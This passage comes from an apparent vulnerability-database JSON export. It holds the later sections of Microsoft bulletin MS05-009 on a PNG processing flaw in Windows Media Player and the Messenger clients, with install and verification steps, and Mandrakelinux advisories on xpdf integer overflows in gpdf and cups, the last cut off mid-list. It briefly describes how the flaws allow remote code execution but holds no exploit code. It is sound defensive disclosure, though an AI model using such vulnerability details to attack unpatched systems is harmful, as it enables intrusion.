attacker would likely seek to exploit this vulnerability by convincing a user to add them to their contacts list, and sending a specially crafted emoticon or display picture.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nYes. Customers running an affected version of MSN Messenger should install the updated version of MSN Messenger.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by updating the library used by MSN Messenger to one that correctly validates the PNG file being passed to it.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nThese vulnerabilities have been publicly released and assigned Common Vulnerability and Exposure number CAN-2004-0597 .\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\nTop of section\r\n Security Update Information \r\n\r\nInstallation Platforms and Prerequisites:\r\n\r\nFor information about the specific security update for your platform, click the appropriate link:\r\n\r\n Microsoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003 \r\n\r\nPrerequisites\r\nThis security update requires Windows Media Player 9 on Windows 2000 Service Pack 3 (SP3) or Service Pack 4 (SP4) or Windows XP Service Pack 1 (SP1) or Windows Server 2003.\r\n\r\nThe software that is listed has been tested to determine if the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support lifecycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting setup\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the previous version of the setup utility uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows Media Player 9 Series on Windows 2000:\r\n\r\nWindowsMediaPlayer9-KB885492-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows Media Player 9 Series on Windows XP and Windows Server 2003:\r\n\r\nWindowsMediaPlayer9-KB885492-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB885492$\Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nMicrosoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003:\r\n\r\nFile Name Version Date Time Size \r\nWmp.dll\r\n 9.0.0.3250\r\n 04-Aug-2004\r\n 07:56\r\n 4,874,240\r\n \r\n\r\nNote When you install this security update on Windows Server 2003, the installer checks to see if any of the files that are being updated on your system have previously been updated by a Microsoft hotfix. If you have previously installed a hotfix to update an affected file, the installer copies the RTMQFE files to your system. Otherwise, the installer copies the RTMGDR files to your system.\r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry key.\r\n\r\nMicrosoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Media Player\wm885492\r\n\r\nNote This registry key may not contain a complete list of installed files. Also, this registry key may not be created correctly if an administrator or an OEM integrates or slipstreams the 885492 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 4.7.0.2009 on Windows XP Service Pack 1 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows Messenger version 4.7.0.2009 (when running on Windows XP Service Pack 1)\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /Q Specifies quiet mode, or suppresses prompts, when files are being extracted.\r\n\r\n /Q:U Specifies user-quiet mode, which presents some dialog boxes to the user.\r\n\r\n /Q:A Specifies administrator-quiet mode, which does not present any dialog boxes to the user.\r\n\r\n /T: <full path> Specifies the target folder for extracting files.\r\n\r\n /C Extracts the files without installing them. If /T: path is not specified, you are prompted for a target folder.\r\n\r\n /C: <Cmd> Override Install Command defined by author. Specifies the path and name of the setup .inf or .exe file.\r\n\r\n /R:N Never restarts the computer after installation.\r\n\r\n /R:I Prompts the user to restart the computer if a restart is required, except when used with /Q:A.\r\n\r\n /R:A Always restarts the computer after installation.\r\n\r\n /R:S Restarts the computer after installation without prompting the user.\r\n\r\nNote These switches do not necessarily work with all updates. If a switch is not available that functionality is necessary for the correct installation of the update. Also, the use of the /N:V switch is unsupported and may result in an unbootable system. If the installation is unsuccessful, you should consult your support professional to understand why it failed to install.\r\n\r\nFor additional information about the supported setup switches, see Microsoft Knowledge Base Article 197147.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, and not force the system to restart, use the following command at a command prompt for Windows 2000 Service Pack 3, Windows 2000 Service Pack 4, Windows XP Service Pack 1, or Windows Server 2003:\r\n\r\nWindowsMessenger-KB887472-PreXPSP2-ENU /q:a /r:n\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nThis update cannot be uninstalled.\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger version 4.7.0.2009 on Windows XP Service Pack 1:\r\n\r\nFile Name Version Date Time Size \r\nMsmsgs.exe\r\n 4.7.0.2010\r\n 16-Nov-2004\r\n 00:18\r\n 1,670,144\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n1.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n \r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by confirming that an is Installed DWORD value with a data value of 1 exists in the following registry key:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 887472 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 4.7.0.3000 on Windows XP Service Pack 2 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft 4.7.0.3000 (when running on Windows XP Service Pack 2)\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting setup\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the previous version of the setup utility uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows XP Service Pack 2:\r\n\r\nWindowsXP-KB887472-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows XP Service Pack 2:\r\n\r\nWindowsXP-KB887472-x86-enu /norestart\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nFor Windows XP Service Pack 2: System administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe is located in the %Windir%\$NTUninstallKB887472$\Spuninst folder. The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger version 4.7.0.3000 on Windows XP Service Pack 2:\r\n\r\nFile Name Version Date Time Size Folder \r\nMsmsgs.exe\r\n 4.7.0.3001\r\n 13-Oct-2004\r\n 16:24\r\n 1,694,208\r\n SP2GDR\r\n \r\nMsmsgs.exe\r\n 4.7.0.3001\r\n 13-Oct-2004\r\n 16:21\r\n 1,694,208\r\n SP2QFE\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB887472\Filelist\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 887472 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 5.0 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows 2000 Service Pack 4, Windows Server 2003, Windows XP Service Pack 1, or Windows XP Service Pack 2.\r\n\r\nInstallation Information\r\n\r\nThis security update is packaged using Windows Installer Version 3.0. For more information, see the product documentation.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger 5.0 on Windows 2000 Service Pack 4, Windows Server 2003, Windows XP Service Pack 1, Windows XP Service Pack 2, or Windows XP Tablet PC Edition:\r\n\r\nFile Name Version Date Time Size \r\nmsmsgs.exe\r\n 5.1\r\n 05-Aug-2003\r\n 17:29\r\n 1,578,160\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n1.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n \r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n\r\nTop of section\r\n\r\n MSN Messenger 6.1 or 6.2 \r\n\r\nPrerequisites\r\n\r\nThis security update requires MSN Messenger 6.1 or 6.2.\r\n\r\nRestart Requirement\r\n\r\nThis update may require you to restart your computer.\r\n\r\nRemoval Information\r\n\r\nThis update cannot be uninstalled.\r\n\r\nVerifying Update Installation\r\n\r\nTo verify that a security update is installed on an affected system, please perform the following steps:\r\n\r\n1.\r\n Within MSN Messenger, Click Help, then About.\r\n \r\n2.\r\n Check the version number.\r\n \r\n\r\nIf the Version number reads 6.2.205 or above the update has been successfully installed.\r\n\r\nTop of section\r\nTop of section\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\r\n\u2022 Carlos Sarraute of Core Security Technologies for reporting the MSN Messenger PNG Processing Vulnerability (CAN-2004-0597).\r\n \r\n\r\nObtaining Other Security Updates:\r\n\r\nUpdates for other security issues are available from the following locations:\r\n\r\n\u2022 Security updates are available from the Microsoft Download Center. You can find them most easily by doing a keyword search for "security_patch."\r\n \r\n\u2022 Updates for consumer platforms are available from the Windows Update Web site.\r\n \r\n\r\nSupport: \r\n\r\n\u2022 Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n \r\n\u2022 International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n \r\n\r\nSecurity Resources: \r\n\r\n\u2022 The Microsoft TechNet Security Web site provides additional information about security in Microsoft products.\r\n \r\n\u2022 Microsoft Software Update Services\r\n \r\n\u2022 Microsoft Baseline Security Analyzer (MBSA)\r\n \r\n\u2022 Windows Update\r\n \r\n\u2022 Windows Update Catalog: For more information about the Windows Update Catalog, see Microsoft Knowledge Base Article 323166.\r\n \r\n\u2022 Office Update \r\n \r\n\r\nSoftware Update Services:\r\n\r\nBy using Microsoft Software Update Services (SUS), administrators can quickly and reliably deploy the latest critical updates and security updates to Windows 2000 and Windows Server 2003-based servers, and to desktop systems that are running Windows 2000 Professional or Windows XP Professional.\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nSystems Management Server:\r\n\r\nMicrosoft Systems Management Server (SMS) delivers a highly-configurable enterprise solution for managing updates. By using SMS, administrators can identify Windows-based systems that require security updates and to perform controlled deployment of these updates throughout the enterprise with minimal disruption to end users. For more information about how administrators can use SMS 2003 to deploy security updates, visit the SMS 2003 Security Patch Management Web site. SMS 2.0 users can also use Software Updates Service Feature Pack to help deploy security updates. For information about SMS, visit the SMS Web site.\r\n\r\nNote SMS uses the Microsoft Baseline Security Analyzer, Microsoft Office Detection Tool and an Enterprise Update Scanning Tool to provide broad support for security bulletin update detection and deployment. Some software updates may not be detected by these tools. Administrators can use the inventory capabilities of the SMS in these cases to target updates to specific systems. For more information about this procedure, visit the following Web site. Some security updates require administrative rights following a restart of the system. Administrators can use the Elevated Rights Deployment Tool (available in the SMS 2003 Administration Feature Pack and in the SMS 2.0 Administration Feature Pack) to install these updates.\r\n\r\nDisclaimer: \r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions: \r\n\r\n\u2022 V1.0 (February 8, 2005): Bulletin published\r\n \r\n", "modified": "2005-02-08T00:00:00", "published": "2005-02-08T00:00:00", "id": "SECURITYVULNS:DOC:7769", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7769", "title": "Microsoft Security Bulletin MS05-009 Vulnerability in PNG Processing Could Allow Remote Code Execution (890261)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandrakelinux Security Update Advisory\r\n _______________________________________________________________________\r\n\r\n Package name: gpdf\r\n Advisory ID: MDKSA-2004:114\r\n Date: October 21st, 2004\r\n\r\n Affected versions: 10.0\r\n ______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Chris Evans discovered numerous vulnerabilities in the xpdf package,\r\n which also effect software using embedded xpdf code, such as gpdf:\r\n \r\n Multiple integer overflow issues affecting xpdf-2.0 and xpdf-3.0.\r\n Also programs like gpdf which have embedded versions of xpdf.\r\n These can result in writing an arbitrary byte to an attacker controlled\r\n location which probably could lead to arbitrary code execution. \r\n \r\n The updated packages are patched to protect against these\r\n vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0888\r\n ______________________________________________________________________\r\n\r\n Updated Packages:\r\n \r\n Mandrakelinux 10.0:\r\n 133d3df8bdbbb8853ed5540df8587608 10.0/RPMS/gpdf-0.112-2.2.100mdk.i586.rpm\r\n 53052a1b9209ff77cf38aa15a7210e7c 10.0/SRPMS/gpdf-0.112-2.2.100mdk.src.rpm\r\n\r\n Mandrakelinux 10.0/AMD64:\r\n a83ab4bcbff0b4ddef26af27d4aa79a4 amd64/10.0/RPMS/gpdf-0.112-2.2.100mdk.amd64.rpm\r\n 53052a1b9209ff77cf38aa15a7210e7c amd64/10.0/SRPMS/gpdf-0.112-2.2.100mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrakeUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandrakesoft for security. You can obtain\r\n the GPG public key of the Mandrakelinux Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandrakelinux at:\r\n\r\n http://www.mandrakesoft.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_linux-mandrake.com\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team\r\n <security linux-mandrake.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQFBeHcmmqjQ0CJFipgRAqyjAJ9HnWL+//FQ7CmBlwGN6MWmVmNb8wCggdi+\r\n9zsZ9hbriWOzPVd7SJfxEeQ=\r\n=zupy\r\n-----END PGP SIGNATURE-----", "modified": "2004-10-22T00:00:00", "published": "2004-10-22T00:00:00", "id": "SECURITYVULNS:DOC:7053", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7053", "title": "MDKSA-2004:114 - Updated gpdf packages fix DoS vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandrakelinux Security Update Advisory\r\n _______________________________________________________________________\r\n\r\n Package name: cups\r\n Advisory ID: MDKSA-2004:116\r\n Date: October 21st, 2004\r\n\r\n Affected versions: 10.0, 9.2, Corporate Server 2.1,\r\n Multi Network Firewall 8.2\r\n ______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Chris Evans discovered numerous vulnerabilities in the xpdf package, \r\n which also effect software using embedded xpdf code:\r\n \r\n Multiple integer overflow issues affecting xpdf-2.0 and xpdf-3.0.\r\n Also programs like cups which have embedded versions of xpdf.\r\n These can result in writing an arbitrary byte to an attacker controlled\r\n location which probably could lead to arbitrary code execution.\r\n (CAN-2004-0888)\r\n \r\n Also, when CUPS debugging is enabled, device URIs containing username \r\n and password end up in error_log. This information is also visible via \r\n "ps". (CAN-2004-0923) \r\n \r\n The updated packages are patched to protect against these\r\n vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0888\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0923\r\n http://www.cups.org/str.php?L920\r\n ______________________________________________________________________\r\n\r\n Updated Packages:\r\n \r\n Mandrakelinux 10.0:\r\n 404f47bf2e48e0fe5e6351fb0a51e482 10.0/RPMS/cups-1.1.20-5.3.100mdk.i586.rpm\r\n 7b4b06f845f94a076c7a5e86ac1ebd0f 10.0/RPMS/cups-common-1.1.20-5.3.100mdk.i586.rpm\r\n 86c01887240c7dc25eaa0584f6f286e0 10.0/RPMS/cups-serial-1.1.20-5.3.100mdk.i586.rpm\r\n 0817ea1f56f41c96361723bd010f08dd 10.0/RPMS/libcups2-1.1.20-5.3.100mdk.i586.rpm\r\n 604d96d4fc8d5590310b0dfdaf95c9da 10.0/RPMS/libcups2-devel-1.1.20-5.3.100mdk.i586.rpm\r\n f56a2a9b631ff34c6a2e1a8eb01f3690 10.0/SRPMS/cups-1.1.20-5.3.100mdk.src.rpm\r\n\r\n Mandrakelinux 10.0/AMD64:\r\n e8e41e0ad06ea13c49aa4097778ef251 amd64/10.0/RPMS/cups-1.1.20-5.3.100mdk.amd64.rpm\r\n 2c76ce0c7f6985fd6cedd2b0f6ba0f67 amd64/10.0/RPMS/cups-common-1.1.20-5.3.100mdk.amd64.rpm\r\n 0f993cd224e36539c1c9938877850385 amd64/10.0/RPMS/cups-serial-1.1.20-5.3.100mdk.amd64.rpm\r\n ff9d25d91c01c44760aac8d1f7f36f79 amd64/10.0/RPMS/lib64cups2-1.1.20-5.3.100mdk.amd64.rpm\r\n e72d698c6ac954e51aa05f746bbe9365 amd64/10.0/RPMS/lib64cups2-devel-1.1.20-5.3.100mdk.amd64.rpm\r\n f56a2a9b631ff34c6a2e1a8eb01f3690 amd64/10.0/SRPMS/cups-1.1.20-5.3.100mdk.src.rpm\r\n\r\n Corporate Server 2.1:\r\n 93ff5afeb1743f9e72ab3307b392b534 corporate/2.1/RPMS/cups-1.1.18-2.5.C21mdk.i586.rpm\r\n b29b8d51b7c0dcca6dc45143d7903cb3 corporate/2.1/RPMS/cups-common-1.1.18-2.5.C21mdk.i586.rpm\r\n 5e3c5468ea0ab2fae1aec809daa894de corporate/2.1/RPMS/cups-serial-1.1.18-2.5.C21mdk.i586.rpm\r\n 8faf77a298ac1421bcf6c95c618303ab corporate/2.1/RPMS/libcups1-1.1.18-2.5.C21mdk.i586.rpm\r\n c7ac9f8314bccd7bc4b1104af279e0f1 corporate/2.1/RPMS/libcups1-devel-1.1.18-2.5.C21mdk.i586.rpm\r\n 39b6eb02f3df6a8ac7b6ec1d9a0642a4 corporate/2.1/SRPMS/cups-1.1.18-2.5.C21mdk.src.rpm\r\n\r\n Corporate Server 2.1/x86_64:\r\n 067a8b88cf8c1377c9c6412136fc7d6b x86_64/corporate/2.1/RPMS/cups-1.1.18-2.5.C21mdk.x86_64.rpm\r\n 51a15362e5f756aff3211ad343588487 x86_64/corporate/2.1/RPMS/cups-common-1.1.18-2.5.C21mdk.x86_64.rpm\r\n 525f0dc8a7ef4db2ffcbe9b7d2a7d677 x86_64/corporate/2.1/RPMS/cups-serial-1.1.18-2.5.C21mdk.x86_64.rpm\r\n 